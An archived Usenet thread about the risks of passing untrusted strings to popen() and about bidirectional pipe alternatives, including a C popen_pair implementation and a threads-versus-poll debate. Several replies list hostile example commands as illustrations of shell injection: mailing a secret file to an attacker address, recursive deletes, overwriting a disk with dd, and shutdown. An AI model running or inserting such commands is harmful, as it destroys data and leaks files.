Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Is popen() unsafe (with untrusted string) ?

46 views
Skip to first unread message

Kenny McCormack

unread,
Jan 7, 2021, 2:20:00 PM1/7/21
to
If I use popen(str,"r") where str is supplied by an untrusted user, what can
go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
sure of the answer), but rather, I'm looking for an example of an unsafe
string (I.e., something an attacker would do).

Also, and this is related, is there a version of popen() (or some library
or something available) that is bidirectional - i.e., you can both write
and read from it - for example, you could run the Unix 'sort' utility this
way - send it some data, then read back the sorted result (*).

(*) This would be like the |& functionality in gawk.

P.S. This is more of a C question than anything else, but you know how
they are in comp.lang.c...

--
"They say if you play a Microsoft CD backwards, you hear satanic messages.
Thats nothing, cause if you play it forwards, it installs Windows."

Richard Kettlewell

unread,
Jan 7, 2021, 2:37:25 PM1/7/21
to
gaz...@shell.xmission.com (Kenny McCormack) writes:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

mail atta...@example.com < /home/gazelle/some/secret/file
rm -rf /home/gazelle/*
echo set -e >> /home/gazelle/.profile
mail -s "I will kill you" someone.important@domain

--
https://www.greenend.org.uk/rjk/

Jim Jackson

unread,
Jan 7, 2021, 2:46:06 PM1/7/21
to
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

Sorry not much help here but ...

> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

I vaguely remember reference to p2open, but it's not on my linux box.
Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".
As I did work on solaris boxes a long time ago, that's where I must have
remembered it from.

Stack overflow has some discussions e.g.

https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork

Barry Margolin

unread,
Jan 7, 2021, 3:20:23 PM1/7/21
to
In article <rt7mss$182o5$1...@news.xmission.com>,
gaz...@shell.xmission.com (Kenny McCormack) wrote:

> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

It can be any command you could type at a terminal, and it's as
dangerous as you would be. So it can delete your files. If you're
permitted to run sudo, it could use that to execute commands as root (if
the perpetrator knows your password).

>
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).
>
> (*) This would be like the |& functionality in gawk.
>
> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

Google "popen2". But beware, it's easy to get deadlocked with something
like this. Many programs use stdio, and output is fully buffered when
writing to a pipe. So you could send something to the program, it
processes it and sends the output, but you never get it because the
program hasn't flushed its output buffer.

--
Barry Margolin, bar...@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***

Kaz Kylheku

unread,
Jan 7, 2021, 3:28:21 PM1/7/21
to
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> If I use popen(str,"r") where str is supplied by an untrusted user, what can
> go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
> sure of the answer), but rather, I'm looking for an example of an unsafe
> string (I.e., something an attacker would do).

For instance, let str = "rm -rf ~".

Popen runs arbitrary shell commands.

Executing a shell command from an untrusted source is exactly the same
thing as logging in remotely to the system via SSH using a public
terminal, and then walking away so that anyone else can use the session.

> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

No. You have to "sandbox" the contents of "str" yourself before passing
it to popen.

For instance you could define your own scripting language (some safe
subset of the shell, probably). In this sandboxed language, unsafe things are
somehow impossible to write (in what ways, to be decided by your design).

You write a compiler for this language whose output is the regular shell
language, and that output is fed to popen(), system(), or to
execl("/bin/sh", "/bin/sh" "-c", str, ...) etc.

Even if that compiler outputs code that uses unsafe features of the
shell language, they are not used in unsafe ways, because the
translation preserves the safe semanics of the sandboxed language.

That's exactly the same like how we can trust the machine language
output by a safe high level language, even though it uses the same
vocabulary of unsafe instructions as an assembly language program.

--
TXR Programming Language: http://nongnu.org/txr

Lew Pitcher

unread,
Jan 7, 2021, 3:29:55 PM1/7/21
to
On Thu, 07 Jan 2021 19:19:56 +0000, Kenny McCormack wrote:

> If I use popen(str,"r") where str is supplied by an untrusted user, what
> can go wrong?

Pretty much anything from simple command failure to deletion of the
entire system. Consider the effects of
popen(str,"r")
when
str = "false";

Consider the effects when
str = "rm -rf .";
or
str = "shutdown -h now";
or
str = "dd if=/dev/zero of=/ bs=1M";

> Note: I'm not debating whether or not it is safe (I'm
> pretty sure of the answer),

So long as you are pretty sure that an unaudited input is completely
unsafe...

> but rather, I'm looking for an example of an
> unsafe string (I.e., something an attacker would do).

See above.

> Also, and this is related, is there a version of popen() (or some
> library or something available) that is bidirectional

Not as a single function, no

> - i.e., you can
> both write and read from it - for example, you could run the Unix 'sort'
> utility this way - send it some data, then read back the sorted result
> (*).

popen() is a wrapper around fork() and exec(), and you can accomplish
bidirectionality by correctly invoking those primitives directly.

> (*) This would be like the |& functionality in gawk.
>
> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

HTH
--
Lew Pitcher
"In Skills, We Trust"

Kaz Kylheku

unread,
Jan 7, 2021, 3:49:05 PM1/7/21
to
Here is a trivial example.

Suppose we write a validator for this language.

expr -> expr '+' expr
| expr '-' expr
| expr '*' expr
| expr '/' expr
| number
| ident
| '(' expr ')'

ident := [a-zA-Z][a-zA-Z0-9]+

number := [-/+]?[0-9]+

If we validate the string to conform to this language, then it loks
like "a + 3 / 4" and whatnot.

We reject strings that don't conform.

Then we can safely do this---almost!

snprintf(big_buffer, .... "echo $(( %s ))", str);

/* check for truncation */

FILE *pipe = popen(big_buffer, "r");

We have defined a safe arithmetic language that we can use the shell to
execute. It won't clobber anything in our host environment.

However, it provides unfettered access to environment variables.

Suppose that the environment has a sensitive, integer-valued environment
variable SECRET_ENV_VAR. The untrusted user can supply that expression
and thereby learn the value of that variable.

Thus, suppose we take this idea further and define a more useful
language than just a calculator language. We have to guard against
leaking secrets from the environment.

One way would be namespacing. The variables in our language like ABC
or def would not translate into the same-named shell variables, but
into, say, sb_ABC and sb_def ("sb" == sandbox).

We could allow that language to have some environment manipulation.
For that we would provide some API. Only certain environment variables
would be loaded into sandboxed variables. For instance if we consider
TERM to be safe, we could pre-load sb_TERM with the value of TERM.
Likewise, we would have a carefully controlled "export" feature, which
only allows certain variables.

If ABC is an export-allowed variable, then the statement
"export ABC=42" in the sandboxed scripting language would
translate to "sb_ABC=42; export ABC=$sb_ABC". I.e. set the local
variable, and then also export the corresponding environment variable
which really has to be called ABC.

Our compiler would gather a list of all variables referenced by the
program, and then for that subset of those variables which are
"environment-allowed", it would emit an initial code block like:

sb_FOO=$FOO ; sb_BAR=$BAR ; ...

# BAZ is not on the whitelist so doesn't appear above

to fetch the value of all referenced whitelisted values from the
environment. Thus the language could access the env var $FOO and $BAR,
but $BAZ would appear uninitialized even if there is such an environment
variable.

Kenny McCormack

unread,
Jan 7, 2021, 4:18:33 PM1/7/21
to
In article <202101071...@kylheku.com>,
Kaz Kylheku <563-36...@kylheku.com> wrote:
...
>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
>No. You have to "sandbox" the contents of "str" yourself before passing
>it to popen.

Just for clarity, these topics are related, but not in the way you think.

I.e., I wasn't implying that a bidirectional popen() would somehow make it
possible to pass arbitrary strings to popen() and have it magically become
safe.

Rather, my (unstated) point was that if I had a bidirectional popen(),
then I could pass data into the sub-process via stdin, rather than on the
command line. This would, in the context of my actual use case (still as
of yet unstated in this thread), solve the real life use case problem.

--
If the automobile had followed the same development cycle as the
computer, a Rolls-Royce today would cost $100, get a million miles to
the gallon, and explode once every few weeks, killing everyone inside.

Kaz Kylheku

unread,
Jan 7, 2021, 4:35:25 PM1/7/21
to
On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> In article <202101071...@kylheku.com>,
> Kaz Kylheku <563-36...@kylheku.com> wrote:
> ...
>>> Also, and this is related, is there a version of popen() (or some library
>>> or something available) that is bidirectional - i.e., you can both write
>>> and read from it - for example, you could run the Unix 'sort' utility this
>>> way - send it some data, then read back the sorted result (*).
>>
>>No. You have to "sandbox" the contents of "str" yourself before passing
>>it to popen.
>
> Just for clarity, these topics are related, but not in the way you think.
>
> I.e., I wasn't implying that a bidirectional popen() would somehow make it
> possible to pass arbitrary strings to popen() and have it magically become
> safe.
>
> Rather, my (unstated) point was that if I had a bidirectional popen(),
> then I could pass data into the sub-process via stdin, rather than on the
> command line. This would, in the context of my actual use case (still as
> of yet unstated in this thread), solve the real life use case problem.

If the two approaches are viable alternatives, it means that you in fact
do not have a requirement to allow an untrusted user to execute
arbitrary program syntax that they specify.

Allowing a "canned" (therefore safely chosen by you) command to receive
input solves the problem of otherwise having to pass the input via
parameters (where they are treated as shell syntax).

If that is the situation, it's not too difficult to escape some data so
that can be passed as arguments. Wrap it in single quotes, and replace
every embedded single quote with '\''.

Jorgen Grahn

unread,
Jan 7, 2021, 4:40:17 PM1/7/21
to
I think questions about this /usually/ begin with an example like:

char buf[1000]; // never mind buffer overflows just now
sprintf(buf, "cat \"%s\"", str);
fd = popen(buf, "r");

Slightly more interesting that way.

/Jorgen

--
// Jorgen Grahn <grahn@ Oo o. . .
\X/ snipabacken.se> O o .

Janis Papanagnou

unread,
Jan 7, 2021, 8:33:22 PM1/7/21
to
On 07.01.2021 20:19, Kenny McCormack wrote:
[ snip already answered popen() question ]
>
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).
>
> (*) This would be like the |& functionality in gawk.

(or like '|&' in ksh)

> P.S. This is more of a C question than anything else, but you know how
> they are in comp.lang.c...

(Not sure you intended this as a "pure C" question but since you
posted in CUS and we can do such things in [some] shells...)

The '<>' redirection in shells allows read/write. With respect to
your sort statement we have to differentiate whether the command is
fully buffered [externally] (but then you could as well serialize
the command) or whether random changes should be possible in the
R/W-opened file. Ksh allows positioning ('seek'ing) in the opened
file with the specific redirection operators <#((N)) and >#((N)) .

Janis

Casper H.S. Dik

unread,
Jan 11, 2021, 11:36:50 AM1/11/21
to
gaz...@shell.xmission.com (Kenny McCormack) writes:

>If I use popen(str,"r") where str is supplied by an untrusted user, what can
>go wrong? Note: I'm not debating whether or not it is safe (I'm pretty
>sure of the answer), but rather, I'm looking for an example of an unsafe
>string (I.e., something an attacker would do).

It depends whether the applications has additional privileges and/or the
user does not have access to a shell; e.g., the user is actually a web
application.

popen() can execute any command a user can through a shell.

>Also, and this is related, is there a version of popen() (or some library
>or something available) that is bidirectional - i.e., you can both write
>and read from it - for example, you could run the Unix 'sort' utility this
>way - send it some data, then read back the sorted result (*).

In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
whether it is common.


There is, of course, a risk: if you write to one end but you are not
reading the other end at the same time, you might be blocked by the
other program which is waiting for your to read but you are blocked
trying to write more. Using threads would fix that.

Casper

spudisno...@grumpysods.com

unread,
Jan 11, 2021, 12:00:13 PM1/11/21
to
On 11 Jan 2021 16:36:37 GMT
Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
>gaz...@shell.xmission.com (Kenny McCormack) writes:
>>Also, and this is related, is there a version of popen() (or some library
>>or something available) that is bidirectional - i.e., you can both write
>>and read from it - for example, you could run the Unix 'sort' utility this
>>way - send it some data, then read back the sorted result (*).
>
>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>whether it is common.
>
>
>There is, of course, a risk: if you write to one end but you are not
>reading the other end at the same time, you might be blocked by the
>other program which is waiting for your to read but you are blocked
>trying to write more. Using threads would fix that.

Or alternatively you could be sensible and use select/poll multiplexing on
the descriptor returned from fileno() instead of messing around with threading
and all the nonsense that goes with it.

Kenny McCormack

unread,
Jan 11, 2021, 8:35:15 PM1/11/21
to
In article <5ffc7e95$0$300$e4fe...@news.xs4all.nl>,
Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
...
>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>whether it is common.

Yes, I read about p2open on Solaris (Oracle whatever they are calling it
now) and it looks quite useful. Any chance there is a publicly available
version of either it (specifically p2open()) or libgen in general for Linux?

--
Hindsight is (supposed to be) 2020.

Trumpers, don't make the same mistake twice.
Don't shoot yourself in the feet - and everywhere else - again!.

Rainer Weikusat

unread,
Jan 12, 2021, 12:53:21 PM1/12/21
to
Something like this is much simpler with threads which can block
individually.

Nicolas George

unread,
Jan 12, 2021, 2:03:09 PM1/12/21
to
Rainer Weikusat , dans le message
<878s8yy...@doppelsaurus.mobileactivedefense.com>, a écrit :
> Something like this is much simpler with threads which can block
> individually.

Until you need some kind of timeout or external interrupt. POSIX threads and
file descriptor I/O do not work well together, it's a common mistake.
Message has been deleted

Kaz Kylheku

unread,
Jan 12, 2021, 4:20:00 PM1/12/21
to
["Followup-To:" header set to comp.unix.programmer.]
On 2021-01-12, Kenny McCormack <gaz...@shell.xmission.com> wrote:
> In article <5ffc7e95$0$300$e4fe...@news.xs4all.nl>,
> Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
> ...
>>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>>whether it is common.
>
> Yes, I read about p2open on Solaris (Oracle whatever they are calling it
> now) and it looks quite useful. Any chance there is a publicly available
> version of either it (specifically p2open()) or libgen in general for Linux?

Here, I just made one.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <sys/socket.h>

typedef struct FILE_pair {
FILE *in, *out;
pid_t pid;
} FILE_pair;

static const FILE_pair error_pair = { NULL, NULL, -1 };

FILE_pair popen_pair(const char *command)
{
int in_pipe[2] = { -1, -1 }; /* from parent point of view */
int out_pipe[2] = { -1, -1 };
pid_t child;

if (pipe(in_pipe) == 0 && pipe(out_pipe) == 0 && (child = fork()) != -1) {
if (child != 0) {
FILE_pair fp;

fp.in = fdopen(in_pipe[0], "r");
fp.out = fdopen(out_pipe[1], "w");
fp.pid = child;

if (fp.in && fp.out) {
/* make output line buffered so we don't have to fflush
* all the time
*/
setvbuf(fp.out, NULL, _IOLBF, 0);
return fp;
}

if (fp.in)
fclose(fp.in);

if (fp.out)
fclose(fp.out);
} else {
/* read end of parent's output pipe is child's input */
dup2(out_pipe[0], STDIN_FILENO);
/* write end of parent's input pipe is child's output */
dup2(in_pipe[1], STDOUT_FILENO);

execl("/bin/sh", "/bin/sh", "-c", command, (char *) NULL);
abort();
}
}

if (child > 0)
kill(child, SIGKILL);
close(in_pipe[0]);
close(in_pipe[1]);
close(out_pipe[0]);
close(out_pipe[1]);
return error_pair;
}

int pclose_pair(FILE_pair fp)
{
int wstatus, result = -1;
fclose(fp.out);

if (waitpid(fp.pid, &wstatus, 0) != -1) {
if (WIFEXITED(wstatus))
result = WEXITSTATUS(wstatus);
}
fclose(fp.in);
return result;
}

int main(void)
{
FILE_pair fp = popen_pair("read foo; printf '%s\\n' $foo");
char buf[72]; // For posting this program to Usenet

if (fp.out != NULL) {
fputs("hello\n", fp.out);

if (fgets(buf, sizeof buf, fp.in))
fputs(buf, stdout);

printf("pipe exit status = %d\n", pclose_pair(fp));
return 0;
}

return EXIT_FAILURE;
}

spudisno...@grumpysods.com

unread,
Jan 13, 2021, 4:15:17 AM1/13/21
to
It really isn't. But if you only know how to use a hammer...

IMO threads should be avoided unless absolutely necessary as the downsides
generally outweigh the upsides but we have a generation of devs brought up
on Windows where threads are the go-to way to do in program multitasking due
to the limitations of that OS and its API.

jo...@schily.net

unread,
Jan 13, 2021, 7:05:11 AM1/13/21
to
In article <slrnrvep...@iridium.wf32df>,
Jim Jackson <j...@franjam.org.uk> wrote:
>On 2021-01-07, Kenny McCormack <gaz...@shell.xmission.com> wrote:

>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
>I vaguely remember reference to p2open, but it's not on my linux box.
>Google gives some references to solaris, Sun's^H^H^H^H Oracle's "Unix".

The idea is not from Solaris, but from AT&T and thus supported by all platforms
that implement SVr4 compatibility. The function is in libgen, see e.g.:

https://sourceforge.net/p/schillix-on/schillix-on/ci/default/tree/usr/src/lib/libgen/common/

>As I did work on solaris boxes a long time ago, that's where I must have
>remembered it from.
>
>Stack overflow has some discussions e.g.
>
>https://stackoverflow.com/questions/3884103/can-popen-make-bidirectional-pipes-like-pipe-fork

This is however only related to the pipe issue, but not to the primary
"untrusted string" question from the OP that is related to security issues.
The reason for the secrurity problem of functions similar to popen() is that
they use system() that may be a e.g. problem with nasty shell envrionment
variables.

In 2008, I wrote a gnome library for high quality CD audio extraction based on
cdda2wav. This needs pipes to stdin/stdout/stderr at the same time and since
cdda2wav is a privileged program, I did not use system() but rather
vfork()/execl().

If you are interested in this implementation, I recommend you to have a look at
recent SCCS sources. The function is called xpopen() and if you fetch the
recent SCCS sources with "schilytools", you should have a look at:

sccs/sccs/lib/mpwlib/src/xpopen.c

See http://sourceforge.net/projects/schilytools/files/ for the downloas
location.

--
EMail:jo...@schily.net Jörg Schilling D-13353 Berlin
Blog: http://schily.blogspot.com/
URL: http://cdrecord.org/private/ http://sourceforge.net/projects/schilytools/files/

Nicolas George

unread,
Jan 13, 2021, 7:38:03 AM1/13/21
to
spudisno...@grumpysods.com, dans le message
<rtmdmv$1o6p$1...@gioia.aioe.org>, a écrit :
> It really isn't. But if you only know how to use a hammer...
>
> IMO threads should be avoided unless absolutely necessary as the downsides
> generally outweigh the upsides but we have a generation of devs brought up
> on Windows where threads are the go-to way to do in program multitasking due
> to the limitations of that OS and its API.

Hear, hear.

POSIX threads are good for high performance. If you have a CPU-intensive
computation that can be parallelized, then use threads.

If you want to handle many network connections as fast as possible, then use
threads too. But not one thread per connection, one thread per processor,
and a poll()-like loop in each.

spudisno...@grumpysods.com

unread,
Jan 13, 2021, 9:45:47 AM1/13/21
to
On 13 Jan 2021 12:38:00 GMT
For absolute speed yes, threads are a solution. But I had an argument with
a project manager a few years ago about wanting to use multiprocess for a
mid load network server - select() -> fork() -> accept() etc - because it was
a bet the company system and we simply could not afford to have a bug in one
network session bring down the entire system. I won in the end, after
explaining to him what fork() and copy-on-write did since he'd never
developed on *nix in his life.


Scott Lurndal

unread,
Jan 13, 2021, 11:12:35 AM1/13/21
to
Can you elaborate on this rather odd statement? POSIX threads and
file descriptor (or even stdio) I/O interfaces work just fine together.

There's always the poll and select family of system calls to provide
timeouts; I use poll extensively in threaded networking code.

Rainer Weikusat

unread,
Jan 13, 2021, 11:35:46 AM1/13/21
to
spudisno...@grumpysods.com writes:
> On Tue, 12 Jan 2021 17:53:09 +0000
> Rainer Weikusat <rwei...@talktalk.net> wrote:
>>spudisno...@grumpysods.com writes:
>>> On 11 Jan 2021 16:36:37 GMT
>>> Casper H.S. Dik <Caspe...@OrSPaMcle.COM> wrote:
>>>>gaz...@shell.xmission.com (Kenny McCormack) writes:
>>>>>Also, and this is related, is there a version of popen() (or some library
>>>>>or something available) that is bidirectional - i.e., you can both write
>>>>>and read from it - for example, you could run the Unix 'sort' utility this
>>>>>way - send it some data, then read back the sorted result (*).
>>>>
>>>>In Solaris there is a p2open()/p2close() as part of libgen; I'm not sure
>>>>whether it is common.
>>>>
>>>>
>>>>There is, of course, a risk: if you write to one end but you are not
>>>>reading the other end at the same time, you might be blocked by the
>>>>other program which is waiting for your to read but you are blocked
>>>>trying to write more. Using threads would fix that.
>>>
>>> Or alternatively you could be sensible and use select/poll multiplexing on
>>> the descriptor returned from fileno() instead of messing around with
>>threading
>>> and all the nonsense that goes with it.
>>
>>Something like this is much simpler with threads which can block
>>individually.
>
> It really isn't. But if you only know how to use a hammer...

It is and your assumption about me is wrong: I've implemented both in
the past and have written a lot more code structured around synchronous
I/O multiplexing loop than multithreaded code.

For the given case, "feeding input to the secondary program" can be
implemented with a thread (or a forked process, obviously) which doesn't
need to interact with anything else in the program. It just writes to
the file descriptor and will blocked by the kernel as necessary.

Another thread just reads whatever data becomes available and processes
it.

For instance, there's absolutely no need for any kind of fancy buffer
management, especially for partial writes, in this case.

Nicolas George

unread,
Jan 13, 2021, 1:23:14 PM1/13/21
to
Scott Lurndal, dans le message <OZELH.2391$ew6...@fx11.iad>, a écrit :
> Can you elaborate on this rather odd statement? POSIX threads and
> file descriptor (or even stdio) I/O interfaces work just fine together.

Oh? Then please tell me: how do you multiplex a mutex or condition wait with
a socket accept?

> There's always the poll and select family of system calls to provide
> timeouts; I use poll extensively in threaded networking code.

That's exactly what I mean: you have threads, and you still need to use I/O
multiplexing.

Scott Lurndal

unread,
Jan 13, 2021, 2:24:15 PM1/13/21
to
No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

For socket endpoints, I'll create a pipe(2) to use to notify the thread to exist and
the thread main loop will poll the pipe and the socket fd. The main code
will write a single byte to the pipe to terminate the poll, and the
thread will exit.

Once can certainly setup one or more threads to just do synchronous I/O on demand using a request
and completion queue (similar to most modern host controller hardware)
without using poll or select.

Kaz Kylheku

unread,
Jan 13, 2021, 2:51:22 PM1/13/21
to
On 2021-01-13, Nicolas George <nicolas$geo...@salle-s.org> wrote:
> Scott Lurndal, dans le message <OZELH.2391$ew6...@fx11.iad>, a écrit :
>> Can you elaborate on this rather odd statement? POSIX threads and
>> file descriptor (or even stdio) I/O interfaces work just fine together.

I understand this as meaning that "to use threads with I/O effectively, we need
to use multiplexing mechanisms that are also usable by single-threaded programs
that don't know anything about threads".

I.e. threads (or at least POSIX threads) do not succeed in replacing mechanisms
for multiplexing events onto one thread such as timeouts, select/poll, async
I/O and whatever.


> Oh? Then please tell me: how do you multiplex a mutex or condition wait with
> a socket accept?

Yes, that can be a problem. I needed to do this in the kernel once,
and wrote it!

In the lmc-2.0 archive given here

http://www.kylheku.com/~kaz/lmc.html

See this function (in mutex.c):

/**
* Atomically give up the mutex and wait on the condition variable.
* Wake up if the specified timeout elapses, or if a signal is delivered.
* Additionally, also wait on the specified file descriptors to become
* ready, combining condition waiting with poll().
* KCOND_WAIT_SUCCESS means the condition was signaled, or one or more
* file descriptors are ready.
* Also, a negative value can be returned indicating an error!
* (The poll needs to dynamically allocate some memory for the wait table).
* The timeout is relative to the current time, specifying how long to sleep in
* jiffies (CPU clock ticks).
*/
int kcond_timed_wait_rel_poll(kcond_t *, kmutex_t *, long,
kcond_poll_t *, unsigned int);

Nicolas George

unread,
Jan 13, 2021, 3:18:41 PM1/13/21
to
Scott Lurndal, dans le message <uNHLH.22369$Ad1....@fx33.iad>, a
écrit :
> No, you don't _need_ to use I/O multiplexing in most cases (e.g. disk files).

Wow, that was a waste of time.

> For socket endpoints, I'll create a pipe(2) to use to notify the thread to
> exist and the thread main loop will poll the pipe and the socket fd. The
> main code will write a single byte to the pipe to terminate the poll, and
> the thread will exit.

So you know how to force threads to work with file descriptors despite the
fact they're not designed for. Good for you.

Philip Guenther

unread,
Jan 14, 2021, 11:13:58 PM1/14/21
to
On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
...
> Also, and this is related, is there a version of popen() (or some library
> or something available) that is bidirectional - i.e., you can both write
> and read from it - for example, you could run the Unix 'sort' utility this
> way - send it some data, then read back the sorted result (*).

One classic (i.e., "decades old") and portable inside POSIX technique that solves a large subset of this problem space is to use a process sandwich, where you create two pipes, then fork twice with one child execing the target utility after some fd swizzling, with the other child serving as the writer/source and the original process being the reader/sink**. This simplifies things whenever the writer and reader operations are not so tightly coupled as to need to share state, the key idea being that running the writer and reader in separate processes eliminates the deadlock issues.

(I suppose this can be 'simplified' by only doing one pipe and fork for the writer, then using popen() for the utility, but that requires more fd swizzling to set up the stdio for the popen() and then revert it afterwards, but I've never seen this idiom written that way.)


This obviously doesn't work when the writer and reader share state. For example, if the process needs to run some non-trivial protocol over a TCP connection (like HTTP, or TLS) to receive the input and send back the output, possibly interleaved, then some way to share the necessary state across the fork would be necessary, which would probably be more complicated than just doing I/O multiplexing with poll() in one process.


Philip Guenther

** or the other way around, with the original process being the writer. The cases I've seen this used have all had the full input available from the start and wanted to carry on processing with the output, so making the writer the child was correct for them.

Kaz Kylheku

unread,
Jan 15, 2021, 3:24:14 AM1/15/21
to
On 2021-01-15, Philip Guenther <guen...@gmail.com> wrote:
> On Thursday, January 7, 2021 at 11:20:00 AM UTC-8, Kenny McCormack wrote:
> ...
>> Also, and this is related, is there a version of popen() (or some library
>> or something available) that is bidirectional - i.e., you can both write
>> and read from it - for example, you could run the Unix 'sort' utility this
>> way - send it some data, then read back the sorted result (*).
>
> One classic (i.e., "decades old") and portable inside POSIX technique
> that solves a large subset of this problem space is to use a process
> sandwich, where you create two pipes, then fork twice with one child
> execing the target utility after some fd swizzling, with the other
> child serving as the writer/source and the original process being the
> reader/sink**.

E.g.

VAR=$(function | sort)

function runs in child process, sort in another, and the original
process captures the output, storing it in VAR.

Rainer Weikusat

unread,
Jan 18, 2021, 12:53:21 PM1/18/21
to
For illustration: Main 'working function' for a program relaying data to
and from a AF_UNIX stream socket:

static void forward_data(int from, int to)
{
char buf[1024];
ssize_t rc_r, rc_w;

while (rc_r = read(from, buf, sizeof(buf)), rc_r > 0) {
rc_w = write(to, buf, rc_r);
rc_w != -1 || sys_die("write");
}

rc_r != -1 || sys_die("read");
}

This runs twice, from a 2nd thread and from main, and that's all of the
program.
0 new messages